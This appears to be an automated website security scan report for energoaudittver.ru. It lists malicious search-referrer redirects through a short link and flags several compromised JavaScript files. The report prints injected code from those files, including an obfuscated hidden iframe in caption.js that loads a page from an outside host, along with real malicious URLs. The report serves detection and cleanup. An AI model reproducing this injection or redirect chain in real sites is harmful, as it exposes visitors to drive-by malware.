Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://energoaudittver.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: energoaudittver.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 13 May 2014 05:30:06 GMT Location: http://tinyurl.com/c2td3xs Server: nginx/1.4.1 Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | malicious |
URL: http://tinyurl.com/c2td3xs (imitation of visitor from search engine) GET /c2td3xs HTTP/1.1 Host: tinyurl.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 13 May 2014 05:30:06 GMT Location: http://gaviatravel.com/includes/phpInputFilter/www/0.php Server: TinyURL/1.6 Content-Length: 0 Content-Type: text/html Set-Cookie: tinyUUID=371ade339e784e9e0be2978f; expires=Wed, 13-May-2015 05:30:06 GMT; path=/; domain=.tinyurl.com X-Powered-By: PHP/5.4.27 X-Tiny: cache 0.0099310874938965 | malicious |
Scanned pages/files
Request | Server response | Status |
http://energoaudittver.ru/ | 200 OK Content-Length: 24875 Content-Type: text/html | clean |
http://energoaudittver.ru/media/system/js/caption.js | 200 OK Content-Length: 11906 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = document.write('<iframe src="'+'ht'+'tp://'+'c'+'h'+'ops'+'h'+'op.eu/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>'); Antivirus reports:
| ||
http://energoaudittver.ru/templates/network_1_6v3/jquery.js | 200 OK Content-Length: 81926 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o] Antivirus reports:
| ||
http://energoaudittver.ru/templates/network_1_6v3/script.js | 200 OK Content-Length: 17772 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function() { var m = document.uniqueID && document.compatMode && !window.XMLHttpRequest && document.execCommand; try { if (!!m) { m('BackgroundImageCache', false, true); } } catch (oh) { }; var u = navigator.userAgent.toLowerCase(); var is = function(t) { return (u.indexOf(t) != -1) }; jQuery('html').addClass([(!(/opera|webtv/i.test(u)) && /msie (\d)/.test(u)) ? ('ie Antivirus reports:
| ||
http://energoaudittver.ru/index.php?option=com_content&view=article&id=54&Itemid=38 | 200 OK Content-Length: 17756 Content-Type: text/html | clean |
http://energoaudittver.ru/index.php?option=com_content&view=article&id=56&Itemid=40 | 200 OK Content-Length: 17647 Content-Type: text/html | clean |
http://energoaudittver.ru/index.php?option=com_content&view=article&id=55&Itemid=39 | 200 OK Content-Length: 16319 Content-Type: text/html | clean |
http://energoaudittver.ru/index.php?option=com_content&view=article&id=14&Itemid=6 | 200 OK Content-Length: 15767 Content-Type: text/html | clean |
http://api-maps.yandex.ru/1.1/?key=AN_DJk4BAAAAUXc7MgIAxFGuOmXtnGNYZevuosECN0ezwmkAAAAAAAAAAACqE4zSM_e6SG6ENvrveTkNChvEpg==&modules=pmap&wizard=constructor | 200 OK Content-Length: 5824 Content-Type: text/javascript | clean |
http://energoaudittver.ru/undefined/ | 404 Not Found Content-Length: 208 Content-Type: text/html | clean |
http://energoaudittver.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://energoaudittver.ru/documenti/fz01.doc | 200 OK Content-Length: 300838 Content-Type: application/msword | clean |
http://energoaudittver.ru/documenti/192010.doc | 200 OK Content-Length: 29696 Content-Type: application/msword | clean |
http://energoaudittver.ru/documenti/gorprog.doc | 200 OK Content-Length: 300836 Content-Type: application/msword | clean |
http://energoaudittver.ru/documenti/152010.doc | 200 OK Content-Length: 43008 Content-Type: application/msword | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=energoaudittver.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://energoaudittver.ru/
Result: energoaudittver.ru is not infected or malware details are not published yet.
Result: energoaudittver.ru is not infected or malware details are not published yet.